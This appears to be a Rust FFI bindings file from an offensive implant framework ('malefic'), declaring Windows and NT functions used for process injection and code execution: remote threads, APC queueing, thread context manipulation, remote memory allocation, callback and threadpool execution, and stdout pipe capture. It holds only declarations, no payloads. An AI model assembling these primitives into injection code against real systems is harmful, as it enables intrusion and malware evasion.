malefic-crates/win/src/kit/binding/binding.rs

extern "C" {
    pub fn MCreateRemoteThread(
        hProcess: *mut ::std::os::raw::c_void,
        lpThreadAttributes: *mut ::std::os::raw::c_void,
        dwStackSize: u32,
        lpStartAddress: *mut ::std::os::raw::c_void,
        lpParameter: *mut ::std::os::raw::c_void,
        dwCreationFlags: u32,
        lpThreadId: *mut u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MOpenThread(
        dwDesiredAccess: u32,
        bInheritHandle: i32,
        dwThreadId: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MSuspendThread(hThread: *mut ::std::os::raw::c_void) -> u32;
}
extern "C" {
    pub fn MResumeThread(hThread: *mut ::std::os::raw::c_void) -> u32;
}
extern "C" {
    pub fn MExitThread(dwExitCode: u32);
}
extern "C" {
    pub fn MGetThreadContext(
        hThread: *mut ::std::os::raw::c_void,
        lpContext: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MSetThreadContext(
        hThread: *mut ::std::os::raw::c_void,
        lpContext: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MWaitForSingleObject(hHandle: *mut ::std::os::raw::c_void, dwMilliseconds: u32) -> u32;
}
extern "C" {
    pub fn MQueueUserApc(
        pfnAPC: *mut ::std::os::raw::c_void,
        hThread: *mut ::std::os::raw::c_void,
        dwData: u32,
    ) -> u32;
}
extern "C" {
    pub fn MNtQueueApcThreadEx(
        ThreadHandle: *mut ::std::os::raw::c_void,
        UserApcReserve: *mut ::std::os::raw::c_void,
        ApcRoutine: *mut ::std::os::raw::c_void,
        ApcArgument1: *mut ::std::os::raw::c_void,
        ApcArgument2: *mut ::std::os::raw::c_void,
        ApcArgument3: *mut ::std::os::raw::c_void,
    ) -> i32;
}
extern "C" {
    pub fn MNtTestAlert() -> i32;
}
extern "C" {
    pub fn MCreateToolhelp32Snapshot(
        dwFlags: u32,
        th32ProcessID: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MThread32First(
        hSnapshot: *mut ::std::os::raw::c_void,
        lpte: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MThread32Next(
        hSnapshot: *mut ::std::os::raw::c_void,
        lpte: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MLoadLibraryA(lpLibFileName: *const u8) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MLoadLibraryW(lpLibFileName: *const u16) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MFreeLibrary(hLibModule: *mut ::std::os::raw::c_void) -> i32;
}
extern "C" {
    pub fn MGetModuleHandleA(lpmodulename: *const u8) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCloseHandle(handle: *mut ::std::os::raw::c_void);
}
extern "C" {
    pub fn MNtClose(handle: *mut ::std::os::raw::c_void) -> i32;
}
extern "C" {
    pub fn MGetDC(hWnd: *mut ::std::os::raw::c_void) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MEnumFontsA(
        hdc: *mut ::std::os::raw::c_void,
        lpLogfont: *const u8,
        lpProc: *mut ::std::os::raw::c_void,
        lParam: isize,
    ) -> i32;
}
extern "C" {
    pub fn MEnumSystemLocalesA(lpLocaleEnumProc: *mut ::std::os::raw::c_void, dwFlags: u32) -> i32;
}
extern "C" {
    pub fn MEnumWindows(lpEnumFunc: *mut ::std::os::raw::c_void, lParam: isize) -> i32;
}
extern "C" {
    pub fn MGetProcAddress(
        module: *const ::std::os::raw::c_void,
        proc_name: *const u8,
    ) -> *const ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateThread(
        thread_attributes: *mut ::std::os::raw::c_void,
        stack_size: u32,
        start_address: *mut ::std::os::raw::c_void,
        parameter: *mut ::std::os::raw::c_void,
        creation_flags: u32,
        thread_id: *mut u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MNtCreateThreadEx(
        thread_handle: *mut ::std::os::raw::c_void,
        desired_access: u32,
        object_attributes: *mut ::std::os::raw::c_void,
        process_handle: *mut ::std::os::raw::c_void,
        start_address: *mut ::std::os::raw::c_void,
        start_parameter: *mut ::std::os::raw::c_void,
        create_suspended: i32,
        stack_zero_bits: u32,
        size_of_stack_commit: u32,
        size_of_stack_reserve: u32,
        attribute_list: *mut ::std::os::raw::c_void,
    ) -> i32;
}
extern "C" {
    pub fn MGetCurrentProcess() -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MaleficMakePipe(
        read: *mut *mut ::std::os::raw::c_void,
        write: *mut *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MaleficPipeRedirectStdOut(
        write: *mut ::std::os::raw::c_void,
    ) -> *const ::std::os::raw::c_void;
}
extern "C" {
    pub fn MaleficPipeRepairedStdOut(stdout_handle: *const ::std::os::raw::c_void);
}
extern "C" {
    pub fn MaleficPipeRead(read_pipe: *mut ::std::os::raw::c_void) -> *const u8;
}
extern "C" {
    pub fn SafeFreePipeData(data: *const u8);
}
extern "C" {
    pub fn CLRVersion() -> RawString;
}
extern "C" {
    pub fn MProcess32First(
        hSnapshot: *mut ::std::os::raw::c_void,
        lppe: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MProcess32Next(
        hSnapshot: *mut ::std::os::raw::c_void,
        lppe: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MNtContinue(ThreadContext: *mut ::std::os::raw::c_void, RaiseAlert: u8) -> i32;
}
extern "C" {
    pub fn MGetNumaNodeProcessorMask(Node: u8, ProcessorMask: *mut u64) -> bool;
}
extern "C" {
    pub fn MNtFlushInstructionCache(
        ProcessHandle: *mut ::std::os::raw::c_void,
        BaseAddress: *mut ::std::os::raw::c_void,
        NumberOfBytesToFlush: usize,
    ) -> i32;
}
extern "C" {
    pub fn MNtQueryInformationThread(
        ThreadHandle: *mut ::std::os::raw::c_void,
        ThreadInformationClass: u32,
        ThreadInformation: *mut ::std::os::raw::c_void,
        ThreadInformationLength: u32,
        ReturnLength: *mut u32,
    ) -> i32;
}
extern "C" {
    pub fn MRtlCaptureContext(ContextRecord: *mut ::std::os::raw::c_void);
}
extern "C" {
    pub fn MAddVectoredExceptionHandler(
        First: u32,
        Handler: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MRemoveVectoredExceptionHandler(Handle: *mut ::std::os::raw::c_void) -> u32;
}
extern "C" {
    pub fn MVirtualAllocExNuma(
        hProcess: *mut ::std::os::raw::c_void,
        lpAddress: *mut ::std::os::raw::c_void,
        dwSize: usize,
        flAllocationType: u32,
        flProtect: u32,
        nndPreferred: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateEventA(
        lpEventAttributes: *mut ::std::os::raw::c_void,
        bManualReset: i32,
        bInitialState: i32,
        lpName: *const u8,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MSetEvent(hEvent: *mut ::std::os::raw::c_void) -> bool;
}
extern "C" {
    pub fn MSleepEx(dwMilliseconds: u32, bAlertable: i32) -> u32;
}
extern "C" {
    pub fn MCreateFileW(
        lpFileName: *mut u16,
        dwDesiredAccess: u32,
        dwShareMode: u32,
        lpSecurityAttributes: *mut ::std::os::raw::c_void,
        dwCreationDisposition: u32,
        dwFlagsAndAttributes: u32,
        hTemplateFile: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MWriteFile(
        hFile: *mut ::std::os::raw::c_void,
        lpBuffer: *mut u8,
        nNumberOfBytesToWrite: u32,
        lpNumberOfBytesWritten: *mut u32,
        lpOverlapped: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MNtSetInformationFile(
        hFile: *mut ::std::os::raw::c_void,
        IoStatusBlock: *mut ::std::os::raw::c_void,
        FileInformation: *mut ::std::os::raw::c_void,
        Length: u32,
        FileInformationClass: u32,
    ) -> i32;
}
extern "C" {
    pub fn MNtQueryInformationProcess(
        ProcessHandle: *mut ::std::os::raw::c_void,
        ProcessInformationClass: u32,
        ProcessInformation: *mut ::std::os::raw::c_void,
        ProcessInformationLength: u32,
        ReturnLength: *mut u32,
    ) -> i32;
}
extern "C" {
    pub fn MCreateThreadpoolWork(
        pfnwk: *mut ::std::os::raw::c_void,
        pv: *mut ::std::os::raw::c_void,
        pcbe: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateThreadpoolIo(
        fl: *mut ::std::os::raw::c_void,
        pfnio: *mut ::std::os::raw::c_void,
        pv: *mut ::std::os::raw::c_void,
        pcbe: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateThreadpoolTimer(
        pfnti: *mut ::std::os::raw::c_void,
        pv: *mut ::std::os::raw::c_void,
        pcbe: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateThreadpoolWait(
        pfnwa: *mut ::std::os::raw::c_void,
        pv: *mut ::std::os::raw::c_void,
        pcbe: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MTpAllocAlpcCompletion(
        AlpcReturn: *mut ::std::os::raw::c_void,
        AlpcPort: *mut ::std::os::raw::c_void,
        Callback: *mut ::std::os::raw::c_void,
        Context: *mut ::std::os::raw::c_void,
        CallbackEnviron: *mut ::std::os::raw::c_void,
    ) -> i32;
}
extern "C" {
    pub fn MTpAllocJobNotification(
        JobReturn: *mut ::std::os::raw::c_void,
        HJob: *mut ::std::os::raw::c_void,
        Callback: *mut ::std::os::raw::c_void,
        Context: *mut ::std::os::raw::c_void,
        CallbackEnviron: *mut ::std::os::raw::c_void,
    ) -> i32;
}
